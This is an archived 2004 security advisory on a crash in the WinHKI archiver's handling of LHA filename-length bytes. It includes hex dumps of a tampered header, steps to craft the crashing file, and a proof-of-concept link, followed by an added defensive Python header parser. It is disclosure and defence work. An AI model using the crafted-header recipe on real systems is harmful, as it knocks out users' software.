~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: WinHKI
Vendors: http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug: LHA File Incorrect Filename Handling Leads to Crash/Underflow
Exploitation: Local (extract file)
Date: 24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@private
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiver which supports the LHA, CAB, HKI, JAR, TAR and GZ compression formats.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal LHA compressed file header:

00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0008 5C31 3032 2E68 746D 4543 sx1 ..\102.htmEC
00000020 3C73 6372 6970 7466 3E61 6C65 7274 2829 <scriptf>alert()
00000030 3C2F 7363 7269 7074 3E0D 0A62 5F2D 6C68 </script>..b_-lh
00000040 642D 0000 0000 0000 0000 94A4 8431 1000 d-...........1..

The last byte in the following code (offset 0x15) specifies the length of the compressed file name. Once it is smaller than the filename's length, WinHKI crashes.

00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0020                          sx1 .

This may be an underflow; I couldn't tell it's an underflow for sure because my MSDEV went into a 100% CPU loop while debugging this.

All we need to do is shorten the length of the filename specified inside the file, or change the byte which sets the filename's size to a higher value. For example:

00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0020 5C31 3073 7373 7373 7373 sx1 . \10sssssss
00000020 3232 2E68 746D 4543 3C73 6372 6970 7466 22.htmEC<scriptf
00000030 3E61 6C65 7274 2829 3C2F 7363 7269 7074 >alert()</script
00000040 3E0D 0A62 5F2D 6C68 642D 0000 0000 0000 >..b_-lhd-......
00000050 0000 94A4 8431 1000 4C5C 446F 6375 6D65 .....1..L\Docume

Using any hex editor such as HexWorkshop, just add anything to the filename.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/poc.lha - (also contains folder names from my old computer...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
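The defect described in section 2 is an archiver trusting the filename-length byte at offset 0x15 even when it disagrees with the header-size byte at offset 0. The following added example (written for this page, not part of the advisory or of WinHKI) parses a level-0 LHA header and rejects exactly that inconsistency before any filename bytes are read; it assumes the standard level-0 layout (header size, checksum, 5-byte method id, two little-endian sizes, DOS time, attribute, level, filename length, filename, CRC16) and uses the header bytes from the advisory's own hex dump as sample input.

```python
import struct

# Level-0 LHA header, fixed part (22 bytes):
#   0: header size (counts bytes after offsets 0 and 1)   1: header checksum
#   2..6: method id (b"-lh0-")        7..10: compressed size, little-endian
#  11..14: original size, LE         15..18: DOS time/date
#  19: attribute  20: header level    21: filename length
#  22..: filename, followed by a 2-byte CRC16 of the original data
FIXED = 22

# Bytes 0x00..0x3A of the advisory's first dump: header plus stored data.
GOOD = bytes.fromhex(
    "1EFF2D6C68302D1B0000001B00000039"
    "7378312000085C3130322E68746D4543") + b"<scriptf>alert()</script>\r\n"
# Same header with the filename-length byte raised to 0x20, as in the
# advisory's crash example (constructed here from GOOD).
BAD = GOOD[:21] + b"\x20" + GOOD[22:]


def parse_level0_header(buf: bytes) -> dict:
    """Parse one level-0 header, refusing any length the buffer cannot back."""
    if len(buf) < FIXED:
        raise ValueError("truncated fixed header")
    hdr_size, chk = buf[0], buf[1]
    comp_size, orig_size = struct.unpack_from("<II", buf, 7)
    level, name_len = buf[20], buf[21]
    if level != 0:
        raise ValueError(f"unsupported header level {level}")
    # The filename-length byte must agree with the header-size byte: the
    # header covers FIXED-2 fixed bytes, the name, and the 2-byte CRC.
    if hdr_size != (FIXED - 2) + name_len + 2:
        raise ValueError(
            f"filename length {name_len} inconsistent with header size {hdr_size}")
    end = 2 + hdr_size                       # first byte of compressed data
    if len(buf) < end + comp_size:
        raise ValueError("header or compressed data runs past end of buffer")
    # Header checksum is the low byte of the sum of bytes 2 .. end-1.
    if sum(buf[2:end]) & 0xFF != chk:
        raise ValueError("bad header checksum")
    name = buf[FIXED:FIXED + name_len]
    crc16 = struct.unpack_from("<H", buf, FIXED + name_len)[0]
    return {"method": buf[2:7], "name": name, "comp_size": comp_size,
            "orig_size": orig_size, "crc16": crc16, "data_offset": end}


def is_well_formed(buf: bytes) -> bool:
    """True if the header parses with every length field consistent."""
    try:
        parse_level0_header(buf)
        return True
    except ValueError:
        return False
```

On the advisory's original header the parser returns the name `\102.htm` and a data offset of 32; on the modified header it raises before touching the filename.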
This archive was generated by hypermail 2.1.3 : Thu Jan 06 2005 - 07:22:52 PST